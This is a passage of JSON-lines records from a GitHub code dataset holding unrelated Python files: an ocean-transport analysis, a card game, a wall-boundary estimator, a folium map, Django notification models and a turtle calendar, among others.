{'PumpActiveCycle': np.zeros(2, dtype=np.int32),\n                      'PumpActiveTime': np.zeros(2, dtype=np.float64),\n                      'TempData': np.zeros((8, 3), dtype=np.float64),\n                      'tEvent': np.zeros(1, dtype=np.float64),\n                      'tGood': np.zeros(1, dtype=np.float64),\n                      'PressureBins': np.zeros((9, len(edge) - 1), dtype=np.float64),\n                      'PressureEdge': edge,\n                      'EventPressure':np.zeros(9, dtype=np.float64)}\n    try:\n        temp = TrimAll(dictionary['slowDAQ'])\n        BinAll(temp, edge)\n        TempData = np.ndarray(shape=(8, 3), dtype=float, order='C')\n        for i in range(1, 9):\n            TempData[i - 1] = Tdata(dictionary['slowDAQ'], 'T' + str(i))\n        PBins = np.ndarray(shape=(9, len(temp['BinTimetrimPT1'])),\n                           dtype=float, order='C')\n        for i in range(1, 10):\n            PBins[i - 1] = temp['BinTimetrimPT' + str(i)]\n        PressData = np.zeros(9)\n        for i in range(1, 10):\n            PressData[i - 1] = Pevent(dictionary['slowDAQ'], 'PT' + str(i))\n        PAC = PumpActiveCycle(dictionary['slowDAQ'])\n        PAT = PumpActiveTime(dictionary['slowDAQ'])\n        EventTime = tEvent(dictionary['slowDAQ'])\n        GoodTime = tGood(dictionary['slowDAQ'], targetPT)\n        DataTrim = {'PumpActiveCycle': PAC,\n                    'PumpActiveTime': PAT,\n                    'TempData': TempData,\n                    'tEvent': EventTime,\n                    'tGood': GoodTime,\n                    'PressureBins': PBins,\n                    'PressureEdge': temp['Bintrim'+targetPT],\n                    'EventPressure': PressData}\n        # print(ShowIndex(DataTrim))\n        # print(DataTrim['PressureBins'])\n        return DataTrim\n    except:\n        return default_output\n","repo_name":"SBC-Collaboration/SBC-Analysis","sub_path":"AnalysisModules/PTData.py","file_name":"PTData.py","file_ext":"py","file_size_in_byte":8008,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"1163967012","text":"'''\nИгра моделирует выбор каждым из двух играющих «наугад» по одной карте из полного\nнабора игральных карт, включающего четыре масти («пики», «трефы», «бубны» и\n«червы») и по 9 достоинств карт в каждой масти («шестерка», «семерка»,\n«восьмерка», «девятка», «десятка», 
«валет», «дама», «король», «туз»), и\nопределение того из участников игры, у которого выбранная карта «старше». При\nэтом условимся, что приведенный выше перечень мастей и карт одной масти дан в\nпорядке увеличения их «старшинства» (например, любая карта масти «бубны» старше\nлюбой карты масти «пики», а «валет червей» старше «десятки червей»).\nПри моделировании названиям мастей и названиям достоинства карты присвоены\nусловные номера:\n• масти «пики» – 1, масти «трефы» – 2, масти «бубны» – 3, масти «червы» – 4;\n• достоинствам: «шестерка» – 6, «семерка» – 7, …, «десятка» – 10,\n«валет» – 11, «дама» – 12, «король» – 13, «туз» – 14.\n'''\n# сделать козырную масть\nfrom random import randint\nimport time\n\nn = 10\npl1 = 0\npl2 = 0\nplayer1 = input('Enter your name: ')\nplayer2 = input('Enter your name: ')\nfor k in range(n):\n num_symbol_1 = randint(1, 4)\n num_digit_1 = randint(6, 14)\n #3. Определение соответствующего названия масти:\n if num_symbol_1 == 1:\n symbol = 'пик'\n elif num_symbol_1 == 2:\n symbol = 'треф'\n elif num_symbol_1 == 3:\n symbol = 'бубен'\n else:\n symbol = 'червей'\n #и названия достоинства карты:\n if num_digit_1 == 6:\n digit = 'Шестерка'\n elif num_digit_1 == 7:\n digit = 'Семерка'\n elif num_digit_1 == 8:\n digit = 'Восьмерка'\n elif num_digit_1 == 9:\n digit = 'Девятка'\n elif num_digit_1 == 10:\n digit = 'Десятка'\n elif num_digit_1 == 11:\n digit = 'Валет'\n elif num_digit_1 == 12:\n digit = 'Дама'\n elif num_digit_1 == 13:\n digit = 'Король'\n else:\n digit = 'Туз'\n print(player1, '- card:', digit, symbol)\n time.sleep(2)\n\n num_symbol_2 = randint(1, 4)\n num_digit_2 = randint(6, 14)\n #3. Определение соответствующего названия масти:\n if num_symbol_2 == 1:\n symbol = 'пик'\n elif num_symbol_2 == 2:\n symbol = 'треф'\n elif num_symbol_2 == 3:\n symbol = 'бубен'\n else:\n symbol = 'червей'\n #и названия достоинства карты:\n if num_digit_2 == 6:\n digit = 'Шестерка'\n elif num_digit_2 == 7:\n digit = 'Семерка'\n elif num_digit_2 == 8:\n digit = 'Восьмерка'\n elif num_digit_2 == 9:\n digit = 'Девятка'\n elif num_digit_2 == 10:\n digit = 'Десятка'\n elif num_digit_2 == 11:\n digit = 'Валет'\n elif num_digit_2 == 12:\n digit = 'Дама'\n elif num_digit_2 == 13:\n digit = 'Король'\n else:\n digit = 'Туз'\n print(player2, '- card:', digit, symbol)\n time.sleep(2)\n\n if num_symbol_1 > num_symbol_2:\n pl1 += 1\n print('@ -',player1,'- @')\n elif num_symbol_2 > num_symbol_1:\n pl2 += 1\n print('@ =',player2,'= @')\n else: #Масти карт игроков одинаковые\n #Сравниваем достоинства карт (их номера)\n if num_digit_1 > num_digit_2:\n pl1 += 1\n print('<',player1,'>')\n elif num_digit_2 > num_digit_1:\n pl2 += 1\n print('<<',player2,'>>')\n else: #Достоинства карт тоже одинаковые3\n print('Ничья!')\n print(player1,':',player2)\n print('% 3d '% pl1, '% 4d '% pl2)\n#Определение результата (3 возможных варианта)\nif pl1 > pl2:\n print('WINNER', player1)\nelif pl1 < pl2:\n print('WINNER', player2)\nelse:\n print('Ничья')","repo_name":"innTall/tasks","sub_path":"games_simples/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22386213666","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"Export across the 1000-m isobath in MOM6\"\"\"\n\nimport xarray as xr\nimport numpy as np\nimport cosima_cookbook as cc\nfrom dask.distributed import Client\nimport sys\n\nif __name__ == '__main__':\n \n client = Client()\n client\n\n year = 
int(sys.argv[1])\n year = str(year)\n expt = sys.argv[2]\n expt_name = sys.argv[3]\n contour_depth = sys.argv[4]\n \n db = expt_name + '.db'\n session = cc.database.create_session(db)\n frequency = '1 monthly'\n path_output = '/g/data/e14/cs6673/mom6_comparison/data_DSW/'\n resolution = expt_name.split('_')[1][:-3]\n \n start_time= year + '-01-01'\n end_time= year + '-12-31'\n\n # reference density in MOM6 \n rho_0 = 1035.0\n # Note: change this range, so it matches the size of contour arrays\n lat_range = slice(-79, -55)\n\n '''Open contour data'''\n ds_contour = xr.open_dataset(\n '/home/142/cs6673/work/mom6_comparison/Antarctic_slope_contours/' +\n 'Antarctic_slope_contour_' + str(contour_depth) + 'm_MOM6_' + resolution +\n 'deg.nc')\n\n # load data and rename coordinates to general x/y to be able to multiply them\n mask_y_transport = ds_contour.mask_y_transport.rename(\n {'yq': 'y', 'xh': 'x'})\n mask_x_transport = ds_contour.mask_x_transport.rename(\n {'yh': 'y', 'xq': 'x'})\n mask_y_transport_numbered = ds_contour.mask_y_transport_numbered.rename(\n {'yq': 'y', 'xh': 'x'})\n mask_x_transport_numbered = ds_contour.mask_x_transport_numbered.rename(\n {'yh': 'y', 'xq': 'x'})\n\n # number of points along contour:\n num_points = int(np.maximum(\n np.max(mask_y_transport_numbered),np.max(mask_x_transport_numbered)))\n \n '''Stack contour data into 1D and extract lat/lon on contour'''\n # Create the contour order data-array. Note that in this procedure the\n # x-grid counts have x-grid dimensions and the y-grid counts have y-grid\n # dimensions, but these are implicit, the dimension *names* are kept\n # general across the counts, the generic y/x, so that concatening\n # works but we dont double up with numerous counts for one lat/lon\n # point.\n \n # stack contour data into 1d:\n mask_x_numbered_1d = mask_x_transport_numbered.stack(contour_index = ['y', 'x'])\n mask_x_numbered_1d = mask_x_numbered_1d.where(mask_x_numbered_1d > 0, drop = True)\n mask_y_numbered_1d = mask_y_transport_numbered.stack(contour_index = ['y', 'x'])\n mask_y_numbered_1d = mask_y_numbered_1d.where(mask_y_numbered_1d > 0, drop = True)\n contour_ordering = xr.concat((mask_x_numbered_1d,mask_y_numbered_1d), dim = 'contour_index')\n contour_ordering = contour_ordering.sortby(contour_ordering)\n\n # get lat and lon along contour, useful for plotting later:\n lat_along_contour = contour_ordering.y\n lon_along_contour = contour_ordering.x\n contour_index_array = np.arange(1,len(contour_ordering)+1)\n # don't need the multi-index anymore, replace with contour count and save\n lat_along_contour = lat_along_contour.drop_vars({'x', 'y', 'contour_index'})\n lat_along_contour.coords['contour_index'] = contour_index_array\n lon_along_contour = lon_along_contour.drop_vars({'x', 'y', 'contour_index'})\n lon_along_contour.coords['contour_index'] = contour_index_array\n \n '''Load mass transport umo and vmo'''\n vmo = cc.querying.getvar(\n expt, 'vmo', session, frequency=frequency,\n start_time=start_time, end_time=end_time,\n chunks={'xh': '200MB', 'yq': '200MB'})\n umo = cc.querying.getvar(\n expt, 'umo', session, frequency=frequency,\n start_time=start_time, end_time=end_time,\n chunks={'xq': '200MB', 'yh': '200MB'})\n\n # select latitude range and this year:\n vmo = vmo.sel(yq=lat_range).sel(time=slice(start_time,end_time))\n vmo = vmo.isel(yq=slice(1, None))\n umo = umo.sel(yh=lat_range).sel(time=slice(start_time,end_time))\n umo = umo.isel(xq=slice(1, None))\n\n # Note that vmo is Ocean Mass Y Transport (kg s-1) and defined as 
the transport across\n # the northern edge of a tracer cell so its coordinates should be (yq, xh).\n # umo is Ocean Mass X Transport (kg s-1) and defined as the transport across\n # the eastern edge of a tracer cell so its coordinates should be (yh, xq).\n # However we will keep the actual name as simply y/x irrespective of the variable\n # to make concatenation and sorting possible.\n vmo = vmo.rename({'yq':'y', 'xh':'x'})\n umo = umo.rename({'yh':'y', 'xq':'x'})\n\n # convert kg/s to Sv and multiply by contour masks\n vmo = vmo/(1e6*rho_0)*mask_y_transport\n umo = umo/(1e6*rho_0)*mask_x_transport\n \n '''Extract transport values along contour'''\n umo_i = umo.compute()\n vmo_i = vmo.compute()\n\n # stack transports into 1d and drop any points not on contour:\n x_transport_1d_i = umo_i.stack(contour_index=['y', 'x'])\n x_transport_1d_i = x_transport_1d_i.where(mask_x_numbered_1d>0, drop=True)\n y_transport_1d_i = vmo_i.stack(contour_index=['y', 'x'])\n y_transport_1d_i = y_transport_1d_i.where(mask_y_numbered_1d>0, drop=True)\n\n # combine all points on contour:\n vol_trans_across_contour = xr.concat(\n (x_transport_1d_i, y_transport_1d_i), dim='contour_index')\n vol_trans_across_contour = vol_trans_across_contour.sortby(contour_ordering)\n vol_trans_across_contour = vol_trans_across_contour.drop_vars(\n {'x', 'contour_index', 'y'})\n vol_trans_across_contour.coords['contour_index'] = contour_index_array\n vol_trans_across_contour = vol_trans_across_contour.compute()\n \n '''Save data'''\n vol_trans_across_contour.name = 'vol_trans_across_contour'\n vol_trans_across_contour.attrs = {\n 'long_name': 'Volume transport across 1000-m isobath',\n 'units': 'Sv'}\n ds = vol_trans_across_contour.to_dataset()\n ds['lat'] = lat_along_contour\n ds['lon'] = lon_along_contour\n if len(vol_trans_across_contour.contour_index) < 15000:\n chunk_ind = len(vol_trans_across_contour.contour_index)\n else:\n chunk_ind = 10000\n enc = {'vol_trans_across_contour':\n {'chunksizes': (12, 99, chunk_ind),\n 'zlib': True, 'complevel': 5, 'shuffle': True}}\n ds.to_netcdf(\n path_output + 'vol_transp_across_' + str(contour_depth) +\n 'm_isobath_' + expt_name + '_' + frequency[:3:2] + '_' +\n year + '.nc', encoding=enc)","repo_name":"schmidt-christina/mom6_comparison","sub_path":"Shelf_export_calculation.py","file_name":"Shelf_export_calculation.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22991323676","text":"''' Given a dictionary of kvalues: coneshapes, estimate wall locations and return their coordinates.'''\n\nfrom shapely.geometry import Point, Polygon, MultiPoint, LineString, MultiLineString\nfrom shapely.ops import polygonize, cascaded_union\nfrom shapely import affinity\nfrom bresenham import bresenham\nimport numpy as np\nimport math\nimport boundary_estimation.vertical_boundary_estimation as vertical_boundary_estimation \nimport boundary_estimation.horizontal_boundary_estimation as horizontal_boundary_estimation \nimport grid_mapping.grid_map as grid_map\n\n\ndef boundaryEstimation(kvalue_coneshapes, trajectory_kvalues):\n # Initialize new gridmap for estimated wall coordinates\n estimatedMap = grid_map.GridMap('')\n estimatedMap.plotTrajectory(trajectory_kvalues)\n \n total_wall_coordinates = []\n \n # Identifying Outer Walls\n outer_wall_coords = outerWallCoordinates(trajectory_kvalues)\n total_wall_coordinates += outer_wall_coords\n \n # Identifying Inner Walls\n for kval in kvalue_coneshapes:\n 
if kval == 0: continue\n \n poly = kvalue_coneshapes[kval]\n prevpoly = previousPolygon(kvalue_coneshapes[kval-1], poly) \n inner_line_segments=[]\n \n if type(poly) == list: # if multiple polys for kvalue\n for p in poly:\n # print(p, kval)\n wall_coordinates = polygonHandler(p, prevpoly)\n \n if poly.index(p) == 0:\n constant_value, constant_index = getWallConstants(wall_coordinates)\n # else:\n # wall_coordinates = smoothCoordinates(wall_coordinates, constant_value, constant_index)\n \n total_wall_coordinates+=wall_coordinates\n inner_line_segments.append(wall_coordinates)\n if type(poly) == Polygon: # only one polygon \n wall_coordinates = polygonHandler(poly, prevpoly)\n total_wall_coordinates += wall_coordinates\n inner_line_segments.append(wall_coordinates)\n extended_segments = mapCompletion(inner_line_segments, outer_wall_coords)\n for seg in extended_segments:\n total_wall_coordinates += seg\n # Remove coordinates coinciding with the trajectory\n trajectory = list(trajectory_kvalues[0].keys())\n for coord in trajectory:\n if coord in total_wall_coordinates:\n total_wall_coordinates.remove(coord)\n \n estimatedMap = estimatedMap.plotWallCoordinates(total_wall_coordinates) \n \n return total_wall_coordinates\n\ndef getWallConstants(wall_coordinates):\n if wall_coordinates == []: return None, None\n startpt, endpt = wall_coordinates[0], wall_coordinates[-1]\n if startpt[0] == endpt[0]:\n return startpt[0], 0\n elif startpt[1] == endpt[1]:\n return startpt[1], 1\n\ndef smoothCoordinates(wall_coordinates, constant_value, constant_index): \n ''' Ensure coordinates have the same constant (x/y) value'''\n new_wall_coordinates=[]\n for coord in wall_coordinates:\n if constant_index == 0:\n new_coord = (constant_value, coord[1])\n new_wall_coordinates.append(new_coord)\n elif constant_index == 1:\n new_coord = (coord[0], constant_value)\n new_wall_coordinates.append(new_coord)\n print(new_wall_coordinates, wall_coordinates)\n return new_wall_coordinates\n\ndef closestpoint(outer_wall_coords, point):\n shortest_dist = None\n closest_point = None\n for coord in outer_wall_coords:\n norm = np.linalg.norm(np.array(point)-np.array(coord))\n if shortest_dist == None or norm < shortest_dist:\n closest_point = coord\n shortest_dist = norm\n return closest_point, shortest_dist\n\ndef extendLine(segment, extension_point, end_point, index_of_interest):\n if index_of_interest == 0: # extending horizontally\n j = extension_point[1]\n extended_segment=[]\n start, end = min(extension_point[0], end_point[0]), max(extension_point[0], end_point[0])\n for i in range(start, end):\n extended_segment.append((i,j))\n elif index_of_interest == 1: # extending vertically\n i = extension_point[0]\n extended_segment = []\n start, end = min(extension_point[1], end_point[1]), max(extension_point[1], end_point[1])\n for j in range(start, end):\n extended_segment.append((i,j))\n\n return extended_segment\n\ndef decomposeSegment(segment):\n # return segments in order of [horizontal segment, vertical segment]\n horizontal_segment, vertical_segment = None, None\n start1, start2 = segment[0], segment[1]\n if start1[0] == start2[0]: \n horizontal_segment = [start1]\n for coord in segment:\n if coord == start1: continue\n if coord[0] == start1[0]:\n horizontal_segment.append(coord)\n else:\n vertical_segment = [coord]\n break\n for coord in segment:\n if coord == vertical_segment[0]: continue\n if coord[1] == vertical_segment[0][1]:\n vertical_segment.append(coord)\n \n elif start1[1] == start2[1]:\n vertical_segment = 
[start1]\n for coord in segment: \n if coord == start1: continue\n if coord[1] == start1[1]:\n vertical_segment.append(coord)\n else:\n horizontal_segment = [coord]\n break\n for coord in segment:\n if coord == horizontal_segment[0]: continue\n if coord[0] == horizontal_segment[0][0]:\n horizontal_segment.append(coord)\n \n \n return[horizontal_segment, vertical_segment]\n \n \n\ndef mapCompletion(inner_line_segments, outer_wall_coords):\n # For every inner line segment, choose one endpoint to extend until it encounters another wall\n extended_segs=[]\n decomposed_segs=[] # segments with both horiz and vertical component\n for seg in inner_line_segments:\n if seg == []: continue\n startpt, endpt = seg[0], seg[-1]\n if startpt[0] == endpt[0]: index_of_interest = 1 # xval constant; extend along y\n elif startpt[1] == endpt[1]: index_of_interest = 0 #yval constant; extend along x\n else:\n decomposed_segments = decomposeSegment(seg)\n decomposed_segs += decomposed_segments\n continue\n \n closest_point_to_start, start_dist = closestpoint(outer_wall_coords, startpt)\n closest_point_to_end, end_dist = closestpoint(outer_wall_coords, endpt)\n \n if start_dist < end_dist:\n extended_segment = extendLine(seg, startpt, closest_point_to_start, index_of_interest)\n extended_segs.append(extended_segment)\n elif end_dist < start_dist:\n extended_segment = extendLine(seg, endpt, closest_point_to_end, index_of_interest)\n extended_segs.append(extended_segment)\n \n for seg in decomposed_segs:\n if seg == []: continue\n startpt, endpt = seg[0], seg[-1]\n if startpt[0] == endpt[0]: index_of_interest = 1 # xval constant; extend along y\n elif startpt[1] == endpt[1]: index_of_interest = 0 #yval constant; extend along x\n closest_point_to_start, start_dist = closestpoint(outer_wall_coords, startpt)\n closest_point_to_end, end_dist = closestpoint(outer_wall_coords, endpt)\n \n if start_dist <= end_dist:\n extended_segment = extendLine(seg, startpt, closest_point_to_start, index_of_interest)\n extended_segs.append(extended_segment)\n elif end_dist < start_dist:\n extended_segment = extendLine(seg, endpt, closest_point_to_end, index_of_interest)\n extended_segs.append(extended_segment)\n \n \n \n return extended_segs\n\n\ndef outerWallCoordinates(trajectory_kvalues, offset_distance=1.1):\n '''\n Return a list of grid coordinates corresponding to the smallest envelope encompassing the coordinates\n of the trajectory and the inner walls identified\n :type trajectory_kvalues: list with 2 elements: [dict of {coord: kval}, (routerx, routery)]\n :rtype: list\n '''\n outer_wall_coords = []\n trajectory = list(trajectory_kvalues[0].keys())\n trajectoryMultiPoint = MultiPoint(trajectory)\n outer_wall_corners = trajectoryMultiPoint.envelope\n outer_wall_corners = list(outer_wall_corners.exterior.coords)\n outer_wall_lines = []\n for i in range(len(outer_wall_corners)-1):\n point1 = outer_wall_corners[i]\n point2 = outer_wall_corners[i+1]\n linestring = LineString([point1, point2])\n outer_wall_lines+=list(linestring.coords)\n \n inner_bounding_box = Polygon(outer_wall_lines)\n inner_bounding_box_scaled = affinity.scale(inner_bounding_box, xfact=offset_distance, yfact=offset_distance)\n \n outer_wall_lines=list(inner_bounding_box_scaled.exterior.coords)\n for i in range(len(outer_wall_lines)-1):\n p1 = (int(outer_wall_lines[i][0]), int(outer_wall_lines[i][1]))\n p2 = (int(outer_wall_lines[i+1][0]), int(outer_wall_lines[i+1][1]))\n \n line = list(bresenham(p1[0],p1[1], p2[0],p2[1]))\n outer_wall_coords+=line\n return 
outer_wall_coords\n\n\n\n\ndef previousPolygon(prevpoly, poly):\n '''\n Given a list of polygons OR a Polygon with kvalue = ki, return the one which is touching the kj polygon to be used for comparsion\n :rtype: Polygon\n '''\n if type(prevpoly) == Polygon:\n return prevpoly\n elif type(prevpoly) == list:\n for p in prevpoly:\n if p.intersects(poly):\n return p\n\n\n\n\ndef slope(x1, y1, x2, y2):\n if abs(x2-x1) == 0:\n return math.inf\n slope = (y2-y1)/(x2-x1)\n return slope\n\ndef wallType(intersection):\n ''' Determine whether wall is vertical or horizontal based on intersection slope'''\n eps1, eps2, alpha = 8, .7, 1\n x1, y1, x2, y2 = intersection.coords[0][0], intersection.coords[0][1], intersection.coords[1][0], intersection.coords[1][1]\n m = slope(x1, y1, x2, y2)\n norm = np.linalg.norm(np.array([x2,y2])-np.array([x1,y1])) # exclude lines with endpoints too close to one another\n \n if (abs(m) > eps1) and norm > alpha:\n return(\"vertical\")\n elif (abs(m) < eps2) and norm > alpha:\n return(\"horizontal\")\n\n\ndef polygonHandler(poly, prevpoly):\n ''' :type poly: current kj Polygon (k_i-1) polygon being analyzed for walls\n :type prevpoly: ki Polygon being compared with kj polygon\n :rtype: wall coordinates \n '''\n # Wall is located in the same direction as the intersection line\n \n intersection = poly.intersection(prevpoly)\n wall_coordinates = [] \n if intersection.geom_type == 'GeometryCollection':\n print(poly)\n for inter in intersection:\n print(inter)\n if inter.geom_type == 'LineString':\n wall_type = wallType(inter)\n if wall_type == 'vertical': \n # print(\"Vertical wall found\")\n wall_coordinates += vertical_boundary_estimation.polygonVerticalWallCoordinates(poly, inter) \n elif wall_type == 'horizontal':\n wall_coordinates += horizontal_boundary_estimation.polygonHorizontalWallCoordinates(poly, inter) \n print(\"\\n\")\n \n elif intersection.geom_type == 'LineString':\n \n wall_coordinates = []\n wall_type = wallType(intersection)\n if wall_type == 'vertical': \n # print(\"Vertical wall found\") \n wall_coordinates += vertical_boundary_estimation.polygonVerticalWallCoordinates(poly, intersection)\n elif wall_type == 'horizontal':\n wall_coordinates += horizontal_boundary_estimation.polygonHorizontalWallCoordinates(poly, inter) \n elif intersection.geom_type == 'MultiLineString':\n wall_coordinates = []\n for inter in intersection:\n if inter.geom_type == 'LineString':\n wall_type = wallType(inter)\n if wall_type == 'vertical': \n print(inter)\n wall_coordinates += vertical_boundary_estimation.polygonVerticalWallCoordinates(poly, inter) \n elif wall_type == 'horizontal':\n wall_coordinates += horizontal_boundary_estimation.polygonHorizontalWallCoordinates(poly, inter) \n \n return wall_coordinates\n\n","repo_name":"uncobruce/Structure-From-Wifi","sub_path":"sparse_inverse/boundary_estimation/boundary_estimation_main.py","file_name":"boundary_estimation_main.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4640606357","text":"import folium\nimport pandas\n\ndata = pandas.read_csv(\"Volcanoes.txt\")\nlon = list(data[\"LON\"])\nlat = list(data[\"LAT\"])\nelev = list(data[\"ELEV\"])\n\n\nmap = folium.Map(location=[38.58, -99.09], zoom_start=6, tiles='Mapbox Bright')\nfg_v = folium.FeatureGroup(name=\"Volcanoes\")\n\nfor lt, lon, el in zip(lat,lon,elev):\n\tif el < 1000:\n\t\tcolor = 'green'\n\telif 1000 <= el < 3000:\t\n\t\tcolor = 'orange'\n\telse:\n\t\tcolor = 
'red'\n\tfg_v.add_child(folium.CircleMarker(location=[lt, lon],popup=\"Elevation: {0} m\".format(el),radius=6, fill_color=color, color=\"grey\",fill_opacity = 0.7))\n\nfg_p = folium.FeatureGroup(name=\"Population\")\n\nfg_p.add_child(folium.GeoJson(data=open('world.json','r', encoding='utf-8-sig'),style_function = lambda x:{'fillColor': 'green' if x['properties']['POP2005'] < 10000000 else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red' }))\n\nmap.add_child(fg_v)\nmap.add_child(fg_p)\nmap.add_child(folium.LayerControl())\nmap.save(\"Map1.html\")","repo_name":"wojkos/Learn","sub_path":"Python/mapping/map1.py","file_name":"map1.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43872107052","text":"from django.db import models\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom medml import models as med_models\n\n\nclass MailType(models.IntegerChoices):\n MSG = 0\n EXPERT_REPLY = 1\n\n\nclass MailDetails(models.Model):\n \"\"\"\n Комментарии к сообщению к эксперту\n \"\"\"\n msg = models.TextField(\n \"Комментарии\",\n default=\"\"\n )\n\n mail_type = models.IntegerField(\n choices=MailType.choices,\n verbose_name=\"Тип соощения\",\n default=0\n )\n\n nodule_type = models.IntegerField(\n \"Тип узла\",\n validators=[MinValueValidator(1), MaxValueValidator(5)],\n default=1,\n null=True\n )\n\n\n class Meta:\n verbose_name=\"Комментарии к сообщению\"\n verbose_name_plural = \"Комментарии к сообщению\"\n\n\nclass NotificationGroup(models.Model):\n title = models.CharField(\n \"Заголовок уведомления\",\n max_length=512,\n default=\"\"\n )\n\n uzi_patient_card = models.ForeignKey(\n med_models.PatientCard,\n on_delete=models.CASCADE,\n verbose_name=\"Карта приема\",\n null=True\n )\n\n create_date = models.DateTimeField(\n verbose_name=\"Дата создания группы\",\n auto_now_add=True\n )\n \n members = models.ManyToManyField(\n med_models.MedWorker,\n verbose_name='Участники',\n related_name='notif_members'\n )\n\n class Meta:\n verbose_name=\"Внутренее уведомление\"\n verbose_name_plural = \"Внутрение уведомления\"\n\n\n\nclass Notification(models.Model):\n notification_group = models.ForeignKey(\n NotificationGroup,\n models.CASCADE,\n verbose_name='Кому',\n related_name='notif_group'\n )\n \n notification_author = models.ForeignKey(\n med_models.MedWorker,\n models.CASCADE,\n verbose_name='От кого',\n related_name='notif_author'\n )\n\n details = models.ForeignKey(\n MailDetails,\n on_delete=models.CASCADE,\n verbose_name='Детали к сообщению',\n default=\"\"\n )\n\n create_date = models.DateTimeField(\n verbose_name=\"Дата создания сообщения\",\n auto_now_add=True\n )\n\n class Meta:\n verbose_name=\"Уведомление\"\n verbose_name_plural = \"Уведомления\"\n\n\nclass NotificationDynamics(models.Model):\n mail = models.ForeignKey(\n Notification,\n on_delete=models.CASCADE,\n verbose_name=\"Просмотренное Уведомление\",\n )\n\n user = models.ForeignKey(\n med_models.MedWorker,\n on_delete=models.CASCADE,\n verbose_name=\"Кто про��мотрел уведомление\",\n )\n\n class MailStatus(models.IntegerChoices):\n NOT_VIEWED = 0\n VIEWED = 1\n\n status = models.IntegerField(\n choices=MailStatus.choices,\n verbose_name=\"Статус Уведомление\",\n default=0\n )\n\n update_date = models.DateTimeField(\n \"Дата изменения\",\n auto_now=True\n )\n\n class Meta:\n verbose_name=\"Динамика Уведомление\"\n verbose_name_plural = \"Динамика Уведомление\"\n unique_together = 
('mail', 'status','user')\n","repo_name":"Sborzov456/medml-server","sub_path":"medweb/inner_mail/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72416856489","text":"import turtle as t\r\n\r\nwn = t.Screen()\r\nwn.tracer(0)\r\nscreen = t.Screen()\r\nscreen.screensize(2000 ,10000)\r\nt.setup()\r\nt.speed(0)\r\n\r\narr_day = [\"Mo\",\"Tu\",\"We\",\"Th\",\"Fr\",\"Sa\",\"Su\"]\r\narr_month =[\"January\", 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']\r\n\r\ndef month(month_no, start_day, no_days, a = 6, b = 7 ):\r\n \r\n #title\r\n for i in range(2):\r\n t.fd(280)\r\n t.right(90)\r\n t.fd(20)\r\n t.right(90)\r\n\r\n t.right(90)\r\n t.fd(20)\r\n t.left(90)\r\n t.write(f\"\\t\\t {arr_month[month_no-1]} 2023\")\r\n \r\n \r\n for cols in range(len(arr_day)):\r\n for i in range(2):\r\n t.fd(40)\r\n t.right(90)\r\n t.fd(20)\r\n t.right(90)\r\n\r\n #table\r\n t.penup()\r\n t.right(45)\r\n t.fd(25)\r\n t.left(45)\r\n t.pendown()\r\n t.write(arr_day[cols])\r\n t.penup()\r\n t.right(45)\r\n t.fd(-25)\r\n t.left(45)\r\n t.pendown()\r\n t.fd(40)\r\n \r\n t.fd(-280)\r\n t.penup()\r\n t.right(90)\r\n t.fd(20)\r\n t.left(90)\r\n t.pendown()\r\n\r\n \r\n c = 0\r\n day = 0\r\n for i in range(a):\r\n for cols in range(b):\r\n for j in range(2):\r\n t.fd(40)\r\n t.right(90)\r\n t.fd(20)\r\n t.right(90)\r\n c += 1\r\n \r\n if c >= start_day and c <= no_days:\r\n day += 1\r\n\r\n t.penup()\r\n t.right(45)\r\n t.fd(25)\r\n t.left(45)\r\n t.pendown()\r\n t.write(day)\r\n t.penup()\r\n t.right(45)\r\n t.fd(-25)\r\n t.left(45)\r\n t.pendown()\r\n \r\n t.fd(40)\r\n \r\n t.fd(-280)\r\n t.penup()\r\n t.right(90)\r\n t.fd(20)\r\n t.left(90)\r\n t.pendown()\r\n\r\ndef draw_month():\r\n t.penup()\r\n t.goto(0, 0)\r\n t.pendown()\r\n \r\n\r\ndef calendar_of_2023(month_no):\r\n if (month_no == 1):\r\n draw_month()\r\n month(1,7,37)\r\n\r\n elif (month_no == 2):\r\n draw_month()\r\n month(2,3,30)\r\n \r\n elif (month_no == 3):\r\n draw_month()\r\n month(3,3,33)\r\n\r\n elif (month_no == 4):\r\n draw_month()\r\n month(4,6,35)\r\n\r\n elif (month_no == 5):\r\n draw_month()\r\n month(5,1,31)\r\n \r\n elif (month_no == 6):\r\n draw_month()\r\n month(6,4,33)\r\n\r\n elif (month_no == 7):\r\n draw_month()\r\n month(7,6,36)\r\n\r\n elif (month_no == 8):\r\n draw_month()\r\n month(8,2,32)\r\n\r\n elif (month_no == 9):\r\n draw_month()\r\n month(9,5,34)\r\n\r\n elif (month_no == 10):\r\n draw_month()\r\n month(10,7,37)\r\n\r\n\r\n elif (month_no == 11):\r\n draw_month()\r\n month(11,3,32)\r\n\r\n elif (month_no == 12):\r\n draw_month()\r\n month(12,5,35)\r\n\r\n\r\n \r\ndef main():\r\n #Enter the number of desired month in the function calendar_of_2023 \r\n calendar_of_2023(1)\r\n t.exitonclick()\r\n\r\nmain()","repo_name":"Teemy17/Python-KMITL","sub_path":"Intro computer programming/HW06/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39808372574","text":"from __future__ import print_function\n\nimport sys\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nsys.path.append('./')\n\nfrom sembm.core.opts import get_arguments\nfrom sembm.datasets import get_dataloader, get_num_classes, get_class_names\nfrom sembm.models import build_model\nfrom 